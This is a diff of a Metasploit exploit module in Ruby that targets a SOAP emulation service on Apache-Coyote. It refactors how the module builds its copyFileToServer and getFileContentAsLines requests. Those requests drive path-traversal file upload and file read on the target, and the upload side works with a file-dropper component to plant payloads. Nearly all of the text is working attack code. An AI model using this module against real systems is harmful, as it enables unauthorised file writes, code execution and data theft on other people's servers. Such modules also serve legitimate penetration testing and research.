44##
55
66require 'msf/core'
7+ require 'rexml/document'
78
89class Metasploit3 < Msf ::Exploit ::Remote
910 Rank = ExcellentRanking
1011
1112 HttpFingerprint = { :pattern => [ /Apache-Coyote\/ 1\. 1/ ] }
1213
14+ include REXML
1315 include Msf ::Exploit ::Remote ::HttpClient
1416 include Msf ::Exploit ::FileDropper
1517
@@ -56,6 +58,49 @@ def initialize(info = {})
5658 ] , self . class )
5759 end
5860
61+ def get_soap_request ( action , opts = { } )
62+ path_param = opts [ :path ]
63+ contents_param = opts [ :contents ]
64+
65+ se_name = ''
66+ case action
67+ when :upload
68+ se_name = 'ser:copyFileToServer'
69+ when :read
70+ se_name = 'ser:getFileContentAsLines'
71+ end
72+
73+ xml = Document . new
74+ xml . add_element (
75+ "soapenv:Envelope" ,
76+ {
77+ 'xmlns:xsi' => "http://www.w3.org/2001/XMLSchema-instance" ,
78+ 'xmlns:xsd' => "http://www.w3.org/2001/XMLSchema" ,
79+ 'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/" ,
80+ 'xmlns:ser' => "http://service.emulation.ws.mercury.com"
81+ } )
82+ xml . root . add_element ( "soapenv:Header" )
83+ xml . root . add_element ( "soapenv:Body" )
84+ body = xml . root . elements [ 2 ]
85+ body . add_element (
86+ se_name ,
87+ {
88+ 'soapenv:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/"
89+ } )
90+ ser = body . elements [ 1 ]
91+ ser . add_element ( "in0" , { 'xsi:type' => 'xsd:int' } )
92+ ser . elements [ 'in0' ] . text = 30000 + rand ( 30000 )
93+ ser . add_element ( "in1" , { 'xsi:type' => 'xsd:string' } )
94+ ser . elements [ 'in1' ] . text = path_param
95+
96+ if action == :upload
97+ ser . add_element ( "in2" , { 'xsi:type' => "xsd:base64Binary" } )
98+ ser . elements [ 'in2' ] . text = Rex ::Text . encode_base64 ( contents_param )
99+ end
100+
101+ xml . to_s
102+ end
103+
59104 def check
60105 depth = datastore [ 'DEPTH' ]
61106 install_path = datastore [ 'INSTALLPATH' ]
@@ -178,23 +223,10 @@ def upload_file(traversal_depth, location, file_name, contents)
178223 path << location
179224 path << "\\ " unless location [ -1 ] == "/" or location [ -1 ] == "\\ "
180225 path << file_name
181- soap_request = <<-EOF
182- <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
183- xmlns:xsd="http://www.w3.org/2001/XMLSchema"
184- xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
185- xmlns:ser="http://service.emulation.ws.mercury.com">
186- <soapenv:Header/>
187- <soapenv:Body>
188- <ser:copyFileToServer soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
189- <in0 xsi:type="xsd:int">#{ 30000 + rand ( 30000 ) }
190- <in1 xsi:type="xsd:string">#{ path }
191- <in2 xsi:type="xsd:base64Binary">#{ Rex ::Text . encode_base64 ( contents ) }
192- </ser:copyFileToServer>
193- </soapenv:Body>
194- </soapenv:Envelope>
195- EOF
196-
197- return send_request_soap ( soap_request )
226+
227+ req = get_soap_request ( :upload , { :path => path , :contents => contents } )
228+
229+ return send_request_soap ( req )
198230 end
199231
200232 def read_file ( traversal_depth , location , file_name )
@@ -203,23 +235,9 @@ def read_file(traversal_depth, location, file_name)
203235 path << "\\ " unless location [ -1 ] == "/" or location [ -1 ] == "\\ "
204236 path << file_name
205237
206- soap_request = <<-EOF
207- <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
208- xmlns:xsd="http://www.w3.org/2001/XMLSchema"
209- xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
210- xmlns:ser="http://service.emulation.ws.mercury.com">
211- <soapenv:Header/>
212- <soapenv:Body>
213- <ser:getFileContentAsLines soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
214- <in0 xsi:type="xsd:int">#{ 30000 + rand ( 30000 ) }
215- <in1 xsi:type="xsd:string">#{ path }
216- </ser:getFileContentAsLines>
217- </soapenv:Body>
218- </soapenv:Envelope>
219- EOF
220-
221-
222- return send_request_soap ( soap_request )
238+ req = get_soap_request ( :read , { :path => path } )
239+
240+ return send_request_soap ( req )
223241 end
224242
225243 def brute_force_depth ( location )
0 commit comments